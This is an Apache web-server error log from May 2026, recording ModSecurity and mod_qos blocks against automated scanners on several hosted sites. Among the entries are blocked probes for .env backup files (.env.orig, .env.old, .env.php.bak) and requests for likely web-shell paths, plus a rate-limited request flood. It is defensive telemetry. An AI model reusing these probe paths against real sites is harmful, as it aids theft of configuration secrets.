[Tue May 26 20:00:20.310946 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c_QAAAMM"]
[Tue May 26 20:00:20.313257 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswALQAAAGU"]
[Tue May 26 20:00:20.313655 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAJQAAADM"]
[Tue May 26 20:00:20.316129 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAPAAAAHI"]
[Tue May 26 20:00:20.330856 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1dBgAAAMk"]
[Tue May 26 20:00:20.337842 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAMQAAAH0"]
[Tue May 26 20:00:20.346918 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c9QAAAIU"]
[Tue May 26 20:00:20.354927 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1dAAAAAQQ"]
[Tue May 26 20:00:20.356666 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c-QAAAPI"]
[Tue May 26 20:00:20.374333 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAQQAAAG8"]
[Tue May 26 20:00:20.384940 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAkQAAAA4"]
[Tue May 26 20:00:20.389335 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAjwAAAH4"]
[Tue May 26 20:00:20.394854 2026] [security2:error] [pid 93576:tid 93616] [remote 45.148.10.62:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env.orig"] [unique_id "ahWufGDRMqfxdEDkoswBCgAAOiU"]
[Tue May 26 20:00:20.407931 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAQAAAAAw"]
[Tue May 26 20:00:20.410578 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dMQAAAJI"]
[Tue May 26 20:00:20.412889 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dLwAAAN4"]
[Tue May 26 20:00:20.413104 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dPQAAAMw"]
[Tue May 26 20:00:20.413378 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAMwAAACM"]
[Tue May 26 20:00:20.416911 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c_wAAALM"]
[Tue May 26 20:00:20.418694 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAhwAAAEQ"]
[Tue May 26 20:00:20.429317 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAkAAAADE"]
[Tue May 26 20:00:20.439647 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkoswAPwAAAAQ"]
[Tue May 26 20:00:20.442192 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAnAAAAHY"]
[Tue May 26 20:00:20.445983 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dPAAAAIk"]
[Tue May 26 20:00:20.464832 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAngAAAAA"]
[Tue May 26 20:00:20.485607 2026] [security2:error] [pid 93576:tid 93821] [client 46.8.110.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswA_AAAAG0"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1220596&moderation-hash=f852f72952a8d927477ae8215fa1e8f7
[Tue May 26 20:00:20.560999 2026] [security2:error] [pid 106517:tid 106562] [remote 45.148.10.62:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env.old"] [unique_id "ahWufIZZc2DoU1lPnP1dpgAArCo"]
[Tue May 26 20:00:20.579040 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBOAAAAFI
[Tue May 26 20:00:20.580155 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWufGDRMqfxdEDkoswBOgAAAE4
[Tue May 26 20:00:20.580198 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWufGDRMqfxdEDkoswBOwAAACI
[Tue May 26 20:00:20.579056 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWufGDRMqfxdEDkoswBOQAAAGo
[Tue May 26 20:00:20.584817 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufIZZc2DoU1lPnP1dtgAAALQ
[Tue May 26 20:00:20.596038 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufIZZc2DoU1lPnP1dugAAAMQ
[Tue May 26 20:00:20.610847 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBPgAAAAQ
[Tue May 26 20:00:20.616335 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBPwAAAHI
[Tue May 26 20:00:20.653425 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBQAAAAC4
[Tue May 26 20:00:20.660844 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBQQAAAF4
[Tue May 26 20:00:20.675256 2026] [security2:error] [pid 93576:tid 93734] [client 103.163.220.51:38453] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/simple.php"] [unique_id "ahWufGDRMqfxdEDkoswBQgAAABY"]
[Tue May 26 20:00:20.727143 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBRwAAADc
[Tue May 26 20:00:20.734492 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufIZZc2DoU1lPnP1dvwAAAM4
[Tue May 26 20:00:20.736856 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBSAAAAAo
[Tue May 26 20:00:20.738319 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBSQAAAAU
[Tue May 26 20:00:20.749198 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBSgAAAAw
[Tue May 26 20:00:20.749227 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBRgAAbSg"]
[Tue May 26 20:00:20.761200 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBSwAAAEM
[Tue May 26 20:00:20.770694 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBTAAAAFo
[Tue May 26 20:00:20.801669 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBTQAAABM
[Tue May 26 20:00:20.809925 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBTgAAAFY
[Tue May 26 20:00:20.876404 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBTwAAAFI
[Tue May 26 20:00:20.885019 2026] [qos:error] [pid 106517:tid 106690] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufIZZc2DoU1lPnP1dwwAAAKw
[Tue May 26 20:00:20.888067 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBUAAAACI
[Tue May 26 20:00:20.890612 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBUQAAAE4
[Tue May 26 20:00:20.902405 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBUgAAAGo
[Tue May 26 20:00:20.961171 2026] [security2:error] [pid 93576:tid 93674] [remote 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBUwAAGV0"], referer: https://www.ndequipments.com/.env.tmp
[Tue May 26 20:00:20.987027 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBWAAAADQ
[Tue May 26 20:00:20.987327 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBWQAAADA
[Tue May 26 20:00:20.988646 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBWgAAAHU
[Tue May 26 20:00:20.992410 2026] [security2:error] [pid 106517:tid 106711] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dqgAAAME"]
[Tue May 26 20:00:20.993170 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufGDRMqfxdEDkoswBWwAAAAQ
[Tue May 26 20:00:21.031321 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBXAAAAHI
[Tue May 26 20:00:21.034657 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1dzAAAAMQ
[Tue May 26 20:00:21.038118 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBXQAAAD0
[Tue May 26 20:00:21.044525 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBXgAAAAg
[Tue May 26 20:00:21.048167 2026] [qos:error] [pid 106517:tid 106656] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1dzQAAAIs
[Tue May 26 20:00:21.054340 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBXwAAAC4
[Tue May 26 20:00:21.136197 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBZAAAAAo
[Tue May 26 20:00:21.136511 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBZQAAAAU
[Tue May 26 20:00:21.136606 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBYwAAADs
[Tue May 26 20:00:21.143176 2026] [security2:error] [pid 93576:tid 93676] [remote 45.148.10.62:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ndequipments.com"] [uri "/.env.php.bak"] [unique_id "ahWufWDRMqfxdEDkoswBZgAAbV8"]
[Tue May 26 20:00:21.152118 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBZwAAAAw
[Tue May 26 20:00:21.181992 2026] [security2:error] [pid 106517:tid 106724] [client 103.163.220.8:59209] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/ab.php"] [unique_id "ahWufYZZc2DoU1lPnP1d0wAAAM4"]
[Tue May 26 20:00:21.183665 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBaAAAAEM
[Tue May 26 20:00:21.184534 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1d1AAAAN8
[Tue May 26 20:00:21.187272 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBaQAAAG8
[Tue May 26 20:00:21.198229 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBagAAAGQ
[Tue May 26 20:00:21.198561 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1d1QAAAKg
[Tue May 26 20:00:21.206058 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBawAAAFo
[Tue May 26 20:00:21.281255 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dTQAAAJE"]
[Tue May 26 20:00:21.281855 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAiQAAADw"]
[Tue May 26 20:00:21.283896 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswArwAAAFU"]
[Tue May 26 20:00:21.304103 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAuwAAAGI"]
[Tue May 26 20:00:21.309431 2026] [security2:error] [pid 106517:tid 106533] [remote 45.148.10.62:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ndequipments.com"] [uri "/.env.php"] [unique_id "ahWufYZZc2DoU1lPnP1d3AAA7A0"]
[Tue May 26 20:00:21.314040 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dSwAAAP8"]
[Tue May 26 20:00:21.320877 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dSQAAAMY"]
[Tue May 26 20:00:21.331566 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dTAAAAKk"]
[Tue May 26 20:00:21.342878 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswApgAAAFw"]
[Tue May 26 20:00:21.343298 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswApwAAAHc"]
